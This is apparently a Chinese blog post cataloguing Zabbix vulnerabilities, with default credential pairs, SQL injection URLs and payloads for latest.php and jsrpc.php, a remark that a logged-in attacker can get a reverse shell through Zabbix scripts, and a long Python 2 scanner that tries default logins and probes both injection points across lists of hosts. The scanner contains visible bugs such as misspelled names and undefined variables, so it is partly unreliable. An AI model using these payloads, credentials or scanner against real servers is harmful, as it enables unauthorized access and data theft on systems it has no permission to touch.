Zabbix漏洞汇总
一、zabbix:
zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
二、Zabbix漏洞:
1、弱口令:
WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
2、SQL注入
(1)
标题:latest.php处toogle_ids[]参数SQL注入
攻击条件:登陆后
危害:可获取系统权限
URL以及payload:
"""
http://a.b.c.d/latest.php?output=ajax&sid=登录后的sessionid的后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""
(2)
标题:jsrpc.php处profileIdx2参数SQL注入
攻击条件:无需登录,亦可以登录后使用高权限的sid、cookie进行替换
危害:一般SQL注入危害
URL以及payload:
"""
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""
(3)
标题:其他SQL注入漏洞:chart_bar.php处itemid参数和periods参数SQL注入;httpmon.php处applications参数SQL注入
攻击条件:不详
危害:不详
URL以及payload:一般SQL注入payload尝试
3、OS命令注入执行:
(1)弱口令登录后,使用zabbix自带的Script执行系统命令可以反弹shell等等
(2)防御:
#不要设置AllowRoot=1,避免agent和server以root权限启动。
#进制agent执行system.run,不要设置EnableRemoteCommands=1。
#即使打补丁。
4、自己写的一个python检查脚本:有问题及时喷我
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
""" # import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser #global varites define
ZabbixTarget = None#target ip address!
ZabbixFile = None#target ip address file
BlackList = [
'incorrect',
'<!-- Login Form -->'
] #global config set
logging.basicConfig(level=logging.INFO,format='%(message)s') #global function defines:
def Config_Init():
"""
Take "http://" to the ip address to create targeturl!
"""
global ZabbixTarget
global ZabbixFile
if ZabbixTarget != None:
target = "http://%s"%ZabbixTarget
return [target]
elif ZabbixFile != None:
targetlist = []
with open(ZabbixFile,"r") as fr:
for ip in fr.readlines():
ip = ip.split("\n")[0].split("\r")[0]
target = "http://%s"%str(ip)
targetlist.append(target)
return targetlist
else:
return [] def get_post_data(page_content):
"""
from response html get post data!
"""
postdata = {}
soup = BeautifulSoup(page_content, "html.parser")
for inputparameter in soup.find_all('input'):
if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
postdata[inputparameter['name']] = inputparameter['value']
return postdata def report_file_allinone():
vulnlist = []
scantime = str(datetime.datetime.now())
for parents,dirs,filenames in os.walk("./"):
for filename in filenames:
if filename.find("zabbix_vulnscan_result") >= 0:
with open(filename,"r") as fr:
vulnlist.extend(fr.readlines())
os.remove(filename)
with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw:
fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
for line in vulnlist:
fw.write(line) #Zabbix Scan Class Defines
class ZabbixScan:
def __init__(self,targetlist):
"""
#class column init!
VulnExpPHPFile:
//0-login-weakpassword
//1-httpmon.php parameter->applicationos
//2-chart_bar.php parameter->itemid
//3-jsrpc.php parameter->profileIdx2
//4-latest.php parameter->toggle_ids[]
//5-OS_Injection->When you login the system you can run you scripts!
TestTarget:
//0-login-weakpassword
//1-jsrpc.php
//2-latest.php
"""
self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary!
self._targetlist = targetlist #wait for scan target!
self._size = len(self._targetlist)#size of scan target!
self._sqlinjectionurl1_vulnlist = []
self._sqlinjectionurl2_vulnlist = []
self._login_weakpassword_vulnlist = []
self._login_weakpassword_safelist = [] def __del__(self):
del self._weakpassword
del self._targetlist
del self._size
del self._sqlinjectionurl1_vulnlist
del self._sqlinjectionurl2_vulnlist
del self._login_weakpassword_vulnlist
del self._login_weakpassword_safelist def __len__(self):
"""return size of targetlist"""
return self._size def _scan_default_password_login(self):
for authinfo in self._weakpassword:
user = authinfo["username"]
pswd = authinfo["password"]
for target in self._targetlist:
logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo)))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
request = requests.session()
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if response.status_code != 200:
self._login_weakpassword_safelist.append(target)
continue
postdata = get_post_data(response.content)
headers["Referer"]=target
postdata["user"] = user
postdata["password"] = pswd
try:
response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if "chkbxRange.init();" in response.content:
for flagstring in BlackList:
if flagstring in response.content:
self._login_weakpassword_safelist.append(target)
self._login_weakpassword_vulnlist.append((target,user,pswd))
else:
self._login_weakpassword_safelist.append(target)
request.close() def _sqlinjectionurl1_scan(self):
logging.info("[*] latest.php sqlinjection scan!")
for vulntarget in self._login_weakpassword_vulnlist:
target = vulntarget[0]
user = vulntarget[1]
pswd = vulntarget[2]
request = requests.session()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
continue
postdata = get_post_data(response.content)
postdata["user"] = user
postdata["password"] = pswd
headers["Referer"]=target
try:
response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
continue
sessionid = response.cookie.values()[0][-16:]
scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid)
try:
response = request.get(scanurl,timeout=20)
except Exception,ex:
continue
if "SQL syntax" in repsonse:
self._sqlinjectionurl1_vulnlist.append(vulntarget)
else:
request.close() def _sqlinjectionurl2_scan(self):
logging.info("[*] jsrpc.php sqlinjection scan!")
for vulntarget in self._targetlist:
scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(url,headers=headers,timeout=20)
except Exception,ex:
continue
if "ed733b8d10be255eceba344d533586" in response.content:
self._sqlinjectionurl2_vulnlist.append(vulntarget)
else:
pass def scan_run(self):
self._scan_default_password_login()
self._sqlinjectionurl1_scan()
self._sqlinjectionurl2_scan() class scanthread(threading.Thread):
def __init__(self,threadname,targetlist):
threading.Thread.__init__(self,name=threadname)
self.scanner = ZabbixScan(targetlist)
self.name = threadname
self.targetlist = targetlist
def _create_csv(self):
scantime = str(datetime.datetime.now())
with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw:
for vuln in self.scanner._login_weakpassword_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "weakpassword"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "latest.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = target.split("http://")[-1]
vulntype = "jsrpc.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
def run(self):
#logging.info("[*] %s running!"%self.name)
#logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist)))
self.scanner.scan_run()
self._create_csv()
#logging.info("[*] %s finished!"%self.name) if __name__ == "__main__":
logging.info("[+]*****************************************************************[+]")
logging.info("Zabbix Scan Init!")
parser = OptionParser()
parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!")
parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!")
parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!")
(options, args) = parser.parse_args()
parameterchecklist = [options.iptarget,options.iptargetfile]
if parameterchecklist in [[None,None],[None,""],["",None],["",""]]:
logging.error("[-] Target parameters error!")
exit(0)
try:
options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum)
except Exception,ex:
logging.error("[-] Threadnum parameter error!")
exit(0)
[ZabbixTarget,ZabbixFile] = parameterchecklist
logging.info("[+] Scan Config Init!")
targetlist = Config_Init()
targetsize = len(targetlist)
logging.info("[+] Scan Target Number:%s"%str(targetsize))
logging.info("[+] Scan Threads Init")
threadtargetsize = targetsize/options.threadnum
devidestart = 0
devideend = threadtargetsize
threadlist = []
nameflag = 0
while True:
threadname = "scan-thread-%s"%str(nameflag)
nameflag += 1
if devideend < targetsize:
threadtargetlist = targetlist[devidestart:devideend]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
elif devidestart <= targetsize:
threadtargetlist = targetlist[devidestart:]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
else:
break logging.info("[+] Scan Thread Start!")
for thread in threadlist:
thread.start()
time.sleep(2)
logging.info("[+] %s --Start!"%thread.name)
for thread in threadlist:
thread.join()
logging.info("[+] Scan Finished!")
logging.info("[+] Report Creating!")
report_file_allinone()
logging.info("[+] Report Create!")
exit(0)
Zabbix漏洞汇总的更多相关文章
- Zabbix 漏洞分析
之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析. PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点. 0x00 Zabbix简介 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
- zabbix漏洞
1:Zabbix配置不当安全事件 ①案例事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0 ...
- Zabbix漏洞学习
Zabbix介绍 zabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. zabbix能监视各种网络参数,保证服务器系统的安全运营:并提供灵 ...
- Zabbix漏洞利用 CVE-2016-10134
最近也是遇见了Zabbix,所以这里以CVE-2016-10134为例复现一下该漏洞 什么是Zabbix? zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. ...
- zabbix 问题汇总
1.Zabbix agent on Zabbix server is unreachable for 5 minutes 查看日志sudo tailf /var/log/zabbix/zabbix_a ...
- 常见Java库漏洞汇总
1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件 ...
- struts2远程代码执行漏洞汇总整理
一.S2-001 1.漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果. 举个例子,当你提交的登录表单为username=xishir& ...
- android CVE 漏洞汇总
arm exploits 技术教程: Learning Pentesting for Android Devices CVE-2015-1530 ,CVE-2015-1474 两个android整数溢 ...
随机推荐
- Homebrew 的安装方法(官方的方法老师安装失败) 第三方
官网:http://brew.sh/index_zh-cn.html 安装方式见 官网,在shell里执行如下语句,如下:ruby -e "$(curl -fsSL https://raw. ...
- centsos各个版本的区别
CentOS-7.0-1406-x86_64-DVD.iso 标准安装版,一般下载这个就可以了CentOS-7.0-1406-x86_64-NetInstall.iso ...
- 关于c# 发射的调用并进行缓存
private static object CreateObject(string AssemblyPath, string classNamespace) { object objObject = ...
- FroalaEditor使用方法汇总
最近在整个移动端富文本编辑器.写完后,在安卓端表现良好,在苹果端测试让我直吐血.开始在网上找了一圈,也没发现自己中意的那款. 今天无意中发现了FroalaEditor,经过在移动端测试一番,表现的好的 ...
- phpstudy+php5.2+mssql2008
我勒个去.... <?php $server ="XEJMZWMDIXE9CIJ"; //服务器IP地址,如果是本地,可以写成localhost $uid ="&q ...
- 关于Unity中UI中的Slider,Toggle和InputField等节点
一.Slider节点 1.创建一个Canvas 2.对Canvas进行一些初始化操作 3.创建一个Image的UI节点在Canvas下面作为子节点 4.把Image铺满整个Canvas,把宽高设置为6 ...
- pip -i 和 -U 参数
例子: pip install -i https://pypi.tuna.tsinghua.edu.cn/simple -U funcat -i: 指定库的安装源 -U:升级 原来已经安装的包,不带U ...
- 使用 const 提高函数的健壮性
使用 const 提高函数的健壮性 看到 const 关键字,C++程序员首先想到的可能是 const 常量.这可不是良好的条件 反射.如果只知道用 const 定义常量,那么相当于把火药仅用于制作 ...
- JS的事件冒泡和事件捕获
先上结论:他们是描述事件触发时序问题的术语.事件捕获指的是从document到触发事件的那个节点,即自上而下的去触发事件.相反的,事件冒泡是自下而上的去触发事件.绑定事件方法的第三个参数,就是控制事件 ...
- 小技巧处理div内容溢出
前几天遇到一个问题,代码是这样一个层次: <div class="province"> <ul> <li>1</li& ...